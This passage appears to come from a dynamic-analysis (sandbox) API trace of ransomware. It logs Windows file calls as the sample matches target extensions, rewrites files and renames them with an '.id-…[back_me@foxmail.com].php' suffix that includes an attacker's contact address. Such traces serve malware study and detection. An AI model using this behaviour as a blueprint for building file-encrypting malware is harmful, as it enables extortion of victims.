Shared\\DW\\DBGHELP.DLL") returned 61 [0056.091] lstrlenW (lpString=".1cd") returned 4 [0056.091] lstrcmpiW (lpString1=".1cd", lpString2=".DLL") returned -1 [0056.091] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\DW\\DBGHELP.DLL") returned 61 [0056.091] lstrlenW (lpString=".jpg") returned 4 [0056.091] lstrcmpiW (lpString1=".jpg", lpString2=".DLL") returned 1 [0056.091] lstrcmpiW (lpString1=".FLT", lpString2=".php") returned -1 [0056.092] lstrlenW (lpString="EPSIMP32.FLT") returned 12 [0056.092] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0056.414] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x3b0ff1c | out: lpFileSize=0x3b0ff1c*=712592) returned 1 [0056.414] CloseHandle (hObject=0x230) returned 1 [0056.415] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt")) returned 0x20 [0056.415] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0056.415] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0056.415] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.415] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.415] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x234 [0056.416] GetLastError () returned 0x0 [0056.416] ReadFile (in: hFile=0x230, lpBuffer=0x43d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b0fed4, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesRead=0x3b0fed4*=0xadf90, lpOverlapped=0x0) returned 1 [0056.430] WriteFile (in: hFile=0x234, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0xadfa0, lpNumberOfBytesWritten=0x3b0fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3b0fc9c*=0xadfa0, lpOverlapped=0x0) returned 1 [0056.443] ReadFile (in: hFile=0x230, lpBuffer=0x43d0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3b0fed4, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesRead=0x3b0fed4*=0x0, lpOverlapped=0x0) returned 1 [0056.443] WriteFile (in: hFile=0x234, lpBuffer=0x43d0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x3b0fc9c, lpOverlapped=0x0 | out: lpBuffer=0x43d0020*, lpNumberOfBytesWritten=0x3b0fc9c*=0xec, lpOverlapped=0x0) returned 1 [0056.443] SetEndOfFile (hFile=0x234) returned 1 [0056.443] CloseHandle (hObject=0x234) returned 1 [0056.443] SetFilePointerEx (in: hFile=0x230, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3b0fec8 | out: lpNewFilePointer=0x0) returned 1 [0056.443] SetEndOfFile (hFile=0x230) returned 1 [0056.449] CloseHandle (hObject=0x230) returned 1 [0056.449] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0056.449] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\epsimp32.flt")) returned 1 [0056.449] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0056.449] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0056.450] lstrlenW (lpString=".doc") returned 4 [0056.450] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0056.450] lstrlenW (lpString=".docx") returned 5 [0056.450] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0056.450] lstrlenW (lpString=".pdf") returned 4 [0056.450] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0056.450] lstrlenW (lpString=".xls") returned 4 [0056.450] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0056.450] lstrlenW (lpString=".xlsx") returned 5 [0056.450] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0056.450] lstrlenW (lpString=".ppt") returned 4 [0056.450] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0056.450] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0056.450] lstrlenW (lpString=".zip") returned 4 [0056.450] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0056.450] lstrlenW (lpString=".rar") returned 4 [0056.450] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0056.450] lstrlenW (lpString=".bz2") returned 4 [0056.450] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0056.450] lstrlenW (lpString=".7z") returned 3 [0056.450] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0056.450] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0056.450] lstrlenW (lpString=".dbf") returned 4 [0056.450] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0056.450] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0056.450] lstrlenW (lpString=".1cd") returned 4 [0056.450] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0056.450] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0056.450] lstrlenW (lpString=".jpg") returned 4 [0056.450] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0056.450] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0056.451] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0056.451] lstrlenW (lpString=".doc") returned 4 [0056.451] lstrcmpiW (lpString1=".doc", lpString2=".FLT") returned -1 [0056.451] lstrlenW (lpString=".docx") returned 5 [0056.451] lstrcmpiW (lpString1=".docx", lpString2="2.FLT") returned -1 [0056.451] lstrlenW (lpString=".pdf") returned 4 [0056.451] lstrcmpiW (lpString1=".pdf", lpString2=".FLT") returned 1 [0056.451] lstrlenW (lpString=".xls") returned 4 [0056.451] lstrcmpiW (lpString1=".xls", lpString2=".FLT") returned 1 [0056.451] lstrlenW (lpString=".xlsx") returned 5 [0056.451] lstrcmpiW (lpString1=".xlsx", lpString2="2.FLT") returned -1 [0056.451] lstrlenW (lpString=".ppt") returned 4 [0056.451] lstrcmpiW (lpString1=".ppt", lpString2=".FLT") returned 1 [0056.451] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0056.451] lstrlenW (lpString=".zip") returned 4 [0056.451] lstrcmpiW (lpString1=".zip", lpString2=".FLT") returned 1 [0056.451] lstrlenW (lpString=".rar") returned 4 [0056.451] lstrcmpiW (lpString1=".rar", lpString2=".FLT") returned 1 [0056.451] lstrlenW (lpString=".bz2") returned 4 [0056.451] lstrcmpiW (lpString1=".bz2", lpString2=".FLT") returned -1 [0056.451] lstrlenW (lpString=".7z") returned 3 [0056.451] lstrcmpiW (lpString1=".7z", lpString2="FLT") returned -1 [0056.451] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0056.451] lstrlenW (lpString=".dbf") returned 4 [0056.451] lstrcmpiW (lpString1=".dbf", lpString2=".FLT") returned -1 [0056.451] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0056.451] lstrlenW (lpString=".1cd") returned 4 [0056.451] lstrcmpiW (lpString1=".1cd", lpString2=".FLT") returned -1 [0056.451] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\EPSIMP32.FLT") returned 67 [0056.451] lstrlenW (lpString=".jpg") returned 4 [0056.451] lstrcmpiW (lpString1=".jpg", lpString2=".FLT") returned 1 [0056.452] lstrcmpiW (lpString1=".FLT", lpString2=".php") returned -1 [0056.452] lstrlenW (lpString="JPEGIM32.FLT") returned 12 [0056.452] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\GRPHFLT\\JPEGIM32.FLT" (normalized: "c:\\program files\\common files\\microsoft shared\\grphflt\\jpegim32.flt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) Thread: id = 19 os_tid = 0x9c4 [0034.898] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10000) returned 0x41e0050 [0034.898] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10000) returned 0x41f0058 [0034.899] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba80c8 [0034.899] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x6) returned 0xbf8d78 [0034.899] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba80e0 [0034.899] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x100000) returned 0x44e0020 [0034.899] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba80f8 [0034.899] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xba80f8, Size=0x20) returned 0xb90270 [0034.899] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x10) returned 0xba80f8 [0034.899] RtlReAllocateHeap (Heap=0xb10000, Flags=0x0, Ptr=0xba80f8, Size=0x20) returned 0xb902c0 [0034.899] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0034.900] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0034.900] Wow64DisableWow64FsRedirection (in: OldValue=0x3d5ff58 | out: OldValue=0x3d5ff58*=0x0) returned 1 [0034.900] lstrlenW (lpString="kernel32.dll") returned 12 [0034.900] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb90270 | out: hHeap=0xb10000) returned 1 [0034.900] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0034.900] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0xb902c0 | out: hHeap=0xb10000) returned 1 [0034.900] Sleep (dwMilliseconds=0x64) [0035.320] lstrcmpiW (lpString1=".ttf", lpString2=".php") returned 1 [0035.320] lstrlenW (lpString="wgl4_boot.ttf") returned 13 [0035.320] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.488] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=47452) returned 1 [0035.488] CloseHandle (hObject=0x1a4) returned 1 [0035.488] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf")) returned 0x20 [0035.488] GetFileAttributesW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.488] CreateFileW (lpFileName="C:\\Boot\\Fonts\\wgl4_boot.ttf" (normalized: "c:\\boot\\fonts\\wgl4_boot.ttf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.488] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.488] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.488] lstrlenW (lpString=".doc") returned 4 [0035.488] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0035.488] lstrlenW (lpString=".docx") returned 5 [0035.488] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0035.488] lstrlenW (lpString=".pdf") returned 4 [0035.488] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0035.488] lstrlenW (lpString=".xls") returned 4 [0035.488] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0035.488] lstrlenW (lpString=".xlsx") returned 5 [0035.488] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0035.488] lstrlenW (lpString=".ppt") returned 4 [0035.488] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0035.488] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.488] lstrlenW (lpString=".zip") returned 4 [0035.488] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0035.488] lstrlenW (lpString=".rar") returned 4 [0035.488] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0035.488] lstrlenW (lpString=".bz2") returned 4 [0035.489] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0035.489] lstrlenW (lpString=".7z") returned 3 [0035.489] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0035.489] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.489] lstrlenW (lpString=".dbf") returned 4 [0035.489] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0035.489] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.489] lstrlenW (lpString=".1cd") returned 4 [0035.489] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0035.489] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.489] lstrlenW (lpString=".jpg") returned 4 [0035.489] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0035.489] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.489] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.489] lstrlenW (lpString=".doc") returned 4 [0035.489] lstrcmpiW (lpString1=".doc", lpString2=".ttf") returned -1 [0035.489] lstrlenW (lpString=".docx") returned 5 [0035.489] lstrcmpiW (lpString1=".docx", lpString2="t.ttf") returned -1 [0035.489] lstrlenW (lpString=".pdf") returned 4 [0035.489] lstrcmpiW (lpString1=".pdf", lpString2=".ttf") returned -1 [0035.489] lstrlenW (lpString=".xls") returned 4 [0035.489] lstrcmpiW (lpString1=".xls", lpString2=".ttf") returned 1 [0035.489] lstrlenW (lpString=".xlsx") returned 5 [0035.489] lstrcmpiW (lpString1=".xlsx", lpString2="t.ttf") returned -1 [0035.489] lstrlenW (lpString=".ppt") returned 4 [0035.489] lstrcmpiW (lpString1=".ppt", lpString2=".ttf") returned -1 [0035.489] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.489] lstrlenW (lpString=".zip") returned 4 [0035.489] lstrcmpiW (lpString1=".zip", lpString2=".ttf") returned 1 [0035.489] lstrlenW (lpString=".rar") returned 4 [0035.489] lstrcmpiW (lpString1=".rar", lpString2=".ttf") returned -1 [0035.489] lstrlenW (lpString=".bz2") returned 4 [0035.489] lstrcmpiW (lpString1=".bz2", lpString2=".ttf") returned -1 [0035.489] lstrlenW (lpString=".7z") returned 3 [0035.489] lstrcmpiW (lpString1=".7z", lpString2="ttf") returned -1 [0035.489] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.490] lstrlenW (lpString=".dbf") returned 4 [0035.490] lstrcmpiW (lpString1=".dbf", lpString2=".ttf") returned -1 [0035.490] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.490] lstrlenW (lpString=".1cd") returned 4 [0035.490] lstrcmpiW (lpString1=".1cd", lpString2=".ttf") returned -1 [0035.490] lstrlenW (lpString="C:\\Boot\\Fonts\\wgl4_boot.ttf") returned 27 [0035.490] lstrlenW (lpString=".jpg") returned 4 [0035.490] lstrcmpiW (lpString1=".jpg", lpString2=".ttf") returned -1 [0035.490] lstrcmpiW (lpString1=".msi", lpString2=".php") returned -1 [0035.490] lstrlenW (lpString="ExcelMUI.msi") returned 12 [0035.490] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.490] GetFileSizeEx (in: hFile=0x1a4, lpFileSize=0x3d5ff1c | out: lpFileSize=0x3d5ff1c*=2506240) returned 1 [0035.490] CloseHandle (hObject=0x1a4) returned 1 [0035.490] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi")) returned 0x2020 [0035.490] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0035.491] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0035.492] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.msi.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1a4 [0035.492] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc6c | out: lpNewFilePointer=0x0) returned 1 [0035.492] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.492] ReadFile (in: hFile=0x1a4, lpBuffer=0x44e0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x44e0058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.526] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xcbf55, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.526] ReadFile (in: hFile=0x1a4, lpBuffer=0x4520058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x4520058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.538] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x3d5fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0035.538] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x223e00, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc2c | out: lpNewFilePointer=0x0) returned 1 [0035.538] ReadFile (in: hFile=0x1a4, lpBuffer=0x4560058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x3d5fc38, lpOverlapped=0x0 | out: lpBuffer=0x4560058*, lpNumberOfBytesRead=0x3d5fc38*=0x40000, lpOverlapped=0x0) returned 1 [0035.808] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fec8 | out: lpNewFilePointer=0x0) returned 1 [0035.808] WriteFile (in: hFile=0x1a4, lpBuffer=0x44e0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x3d5fcb0, lpOverlapped=0x0 | out: lpBuffer=0x44e0020*, lpNumberOfBytesWritten=0x3d5fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0035.825] SetEndOfFile (hFile=0x1a4) returned 1 [0035.825] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x42bd930 [0035.825] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0035.825] WriteFile (in: hFile=0x1a4, lpBuffer=0x42bd930*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bd930*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0035.826] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xcbf55, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0035.827] WriteFile (in: hFile=0x1a4, lpBuffer=0x42bd930*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bd930*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0035.832] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0x223e00, lpNewFilePointer=0x0, dwMoveMethod=0x3d5fc7c | out: lpNewFilePointer=0x0) returned 1 [0035.832] WriteFile (in: hFile=0x1a4, lpBuffer=0x42bd930*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x3d5fc88, lpOverlapped=0x0 | out: lpBuffer=0x42bd930*, lpNumberOfBytesWritten=0x3d5fc88*=0x40000, lpOverlapped=0x0) returned 1 [0035.837] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x42bd930 | out: hHeap=0xb10000) returned 1 [0035.837] CloseHandle (hObject=0x1a4) returned 1 [0036.619] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0036.620] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.620] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.620] lstrlenW (lpString=".doc") returned 4 [0036.620] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0036.620] lstrlenW (lpString=".docx") returned 5 [0036.620] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0036.620] lstrlenW (lpString=".pdf") returned 4 [0036.620] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0036.620] lstrlenW (lpString=".xls") returned 4 [0036.620] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0036.620] lstrlenW (lpString=".xlsx") returned 5 [0036.620] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0036.620] lstrlenW (lpString=".ppt") returned 4 [0036.620] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0036.620] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.620] lstrlenW (lpString=".zip") returned 4 [0036.620] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0036.620] lstrlenW (lpString=".rar") returned 4 [0036.620] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0036.620] lstrlenW (lpString=".bz2") returned 4 [0036.620] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0036.620] lstrlenW (lpString=".7z") returned 3 [0036.620] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0036.620] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.620] lstrlenW (lpString=".dbf") returned 4 [0036.620] lstrcmpiW (lpString1=".dbf", lpString2=".msi") returned -1 [0036.620] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.620] lstrlenW (lpString=".1cd") returned 4 [0036.620] lstrcmpiW (lpString1=".1cd", lpString2=".msi") returned -1 [0036.620] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.620] lstrlenW (lpString=".jpg") returned 4 [0036.620] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0036.620] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.621] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.621] lstrlenW (lpString=".doc") returned 4 [0036.621] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0036.621] lstrlenW (lpString=".docx") returned 5 [0036.621] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0036.621] lstrlenW (lpString=".pdf") returned 4 [0036.621] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0036.621] lstrlenW (lpString=".xls") returned 4 [0036.621] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0036.621] lstrlenW (lpString=".xlsx") returned 5 [0036.621] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0036.621] lstrlenW (lpString=".ppt") returned 4 [0036.621] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0036.621] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.msi") returned 75 [0036.621] lstrlenW (lpString=".zip") returned 4 [0036.621] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0036.621] lstrlenW (lpString=".rar") returned 4 [0036.621] lstrcmpiW 